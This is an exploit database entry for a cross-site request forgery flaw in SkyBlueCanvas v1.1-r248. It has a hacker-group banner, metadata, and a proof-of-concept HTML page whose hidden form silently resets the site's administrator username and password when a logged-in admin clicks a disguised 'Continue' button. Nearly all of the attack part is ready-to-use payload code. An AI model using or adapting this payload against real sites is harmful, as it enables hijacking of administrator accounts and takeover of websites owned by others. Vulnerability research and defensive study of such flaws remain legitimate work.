Skybluecanvas.v1.1-r248 CSRF vulnirabilities

2010-09-23T00:00:00
ID 1337DAY-ID-14152
Type zdt
Reporter Sweet
Modified 2010-09-23T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ============================================
Skybluecanvas.v1.1-r248 CSRF vulnirabilities
============================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                       Sweet the Algerian Haxxor                      0
1                    ######################################            0
0                                                                      1
1  [+]Exploit Title: Skybluecanvas.v1.1-r248 CSRF vulnirabilitie       0
0  [+]Date: 022/09/2010                                                1
1  [+]Author: Sweet                                                    0
0  [+]Contact : [email protected]                                    0
1  [+]Software Link: www.skybluecanvas.com                             0
0  [+]Download: www.skybluecanvas.com/downloads.html                   1
1  [+]Version:v1.1-r248                                                0
0  [+]Tested on: Backtrack 4                                           1
1  [+]Risk : Hight                                                     0
0  [+]Description :                                                    0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
----=PoC=----
<html>
<body>
<h3>Skybluecanvas.v1.1-r248 CSRF vulnirabilitie</h3>
<form method="POST" name="form0" action="http://target.com/path/admin.php?mgroup=settings&mgr=password&objtype=password">
<input type="hidden" name="id" value="1"/>
<input type="hidden" name="username" value="admin"/>    <!-- User name     -->
<input type="hidden" name="password" value="password"/> <!-- your password  -->
<input type="hidden" name="confirm" value="password"/>  <!-- confirm password -->
<p> Press Continue to update admin information <input type="submit" name="submit" value="Continue"/> </p>
</form>
<form method="GET" name="form1" action="http://target.com/path/admin.php?mgroup=settings&mgr=password&objtype=password">
<input type="hidden" name="name" value="value"/>
</form>
<form method="GET" name="form2" action="http://target.com/path/admin.php">
<input type="hidden" name="name" value="value"/>
</form>
<form method="GET" name="form3" action="http://target.com/path/admin.php?mgr=login&js=1">
<input type="hidden" name="name" value="value"/>
</form>
</body>
</html>
 
 
(thx to Milw0rm.com , JF - Hamst0r - Keystroke) R.I.P  , inj3ct0r.com , exploit-db.com, packetstormsecurity.org, http://ha.ckers.org
 
 
et 1,2,3 viva L'Algerie :))



#  0day.today [2018-01-03]  #